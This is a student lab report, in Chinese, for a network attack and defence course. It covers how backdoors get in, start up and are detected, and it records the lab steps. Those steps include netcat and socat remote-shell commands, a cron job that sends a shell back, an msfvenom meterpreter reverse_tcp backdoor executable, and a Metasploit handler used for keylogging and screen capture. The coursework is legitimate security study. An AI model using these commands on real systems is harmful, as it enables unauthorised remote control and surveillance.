20145238-荊玉茗《網絡對抗》-後門原理與實踐

《網絡對抗》——後門原理與實踐

1、基礎問題回答

(1)例舉你能想到的一個後門進入到你係統中的可能方式？

• 答：在網上下載東西的時候，總會有不想要的應用連帶着下載下來，好比某大師，並且下載之後還一直沒法刪除，有一段時間cpu佔用率就超級高，可是沒開什麼應用。
  可能這是一個後門
  

(2)例舉你知道的後門如何啓動起來(win及linux)的方式？

• 開機自啓動；開啓別的應用時自動加載；在網頁上超連接；

(3)Meterpreter有哪些給你映像深入的功能？

• 此次關於meterpreter的實驗我都很是驚訝，從傳輸後門程序，到抓主機鍵盤鍵，主機屏幕，還有看到別人抓到攝像頭，，，彷彿在電腦上工做，就像在一個透明的玻璃箱裏工做。雖然知道這些技能很酷炫，但我更想了解一些怎樣才能防護這些後門植入的知識。

(4)如何發現本身有系統有沒有被安裝後門？

• 先用殺毒軟件吧，，，及時監控進程是否異常，數據流異常以及開機自啓動項，看看有沒有消耗cpu特別大的進程。

2、實驗總結與體會

• 本次實驗整體來講仍是坎坷的，從socat就開始遇到問題，一方面是win10自己的問題，另外一方面是本身並非十分清楚步驟的流程以及爲何這樣，因此致使不少順序的顛倒，ip地址的寫錯...各類小緣由都成爲我沒法繼續的絆腳石。本次實驗第一次讓我感覺到了做爲一名「hacker」的酷炫，在大三下才真正的接觸到網絡攻防，哇~~~好開心，痛苦並快樂着。迴歸主題就是，本次實驗讓我感覺到網絡「攻防」，即「攻」也得「防」，兩者缺一不可，網絡在個人腦海裏從一個「黑匣子」慢慢變成一個「玻璃箱」。但願之後能繼續認真作每一次實驗，繼續努力~

3、實踐過程記錄

1.用nc獲取遠程主機的shell

①在linux獲取windows 的shell

• 在windows中下載netcat，解壓後複製到c盤windows\system32中。
• linux IP：192.168.228.128
  windows IP：172.30.6.146
• linux獲取windows的shell
  在kali中輸入指令nc -l -p 端口號來設置監聽；
  

在Windows中輸入指令ncat.exe -e cmd kali的IP 端口號來將本身的cmd傳給kali；

• 在linux中能夠看到擁有了windows cmd的命令提示，記得要退出system32文件夾才能夠看ipconfig哦。
  

②cron啓動

• 使用crontab -e修改配置文件，將最後一行改成m h dom mon dow user command，:wq!保存並退出。
  

• 使用crontab -l
  

這樣kali內每小時的第20分鐘自動運行指令，反彈至pc端的5238端口

2.使用socat獲取主機操做shell

• 在windows系統中打開控制面板—管理工具-任務計劃程序-建立任務-填寫任務名稱後新建觸發器，以下圖所示。
  

• 在操做-程序或腳本中選擇socat.exe文件路徑，在添加參數中寫tcp-listen:5238 exec:cmd.exe,pty,stderr,即將cmd.exe綁定到5238端口，同時將cmd.exe的stderr重定向到stdout上。以後能夠看到本身的任務，右鍵運行！
  

• 在linux中輸入socat - tcp:IP:端口號
  

3.使用MSF meterpreter生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機shell

• 在kali中輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=虛擬機IP LPORT=端口號 -f exe >20145224.exe生成後門程序：
  

• ncat傳輸後門文件
  windows系統使用ncat.exe -lv 端口號 > 保存文件名監聽準備接受文件；
  

kali系統使用ncat -nv 主機IP 端口號 < 文件名來發送指定文件；

4.使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權

• 在kali中輸入msfconsole
• 繼續輸入use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set LHOST 主機IP
• set LPORT 端口號
• show options（檢查全部數據是否正確）
• exploit

• 雙擊windows中的後門應用程序，此時在kali中即可以成控制遠程windows的shell了~。

屏幕截圖

鍵盤抓取

其餘

• 錯誤一
  

解決方法：首先是添加的觸發器進程沒有運行...其次是端口可能被佔用，改了之後仍是不行，最後發現他的ip變了！！！！！！真的變了！以後成功了。

• 錯誤二：最後meterpreter，windows這邊運行後門程序，可是linux那邊沒有反應，太藍過了就忘記截圖了。 解決方法：第一次試了很久都沒好，次日就行了......很尷尬，可能須要從新啓動計算機，讓他開始運行。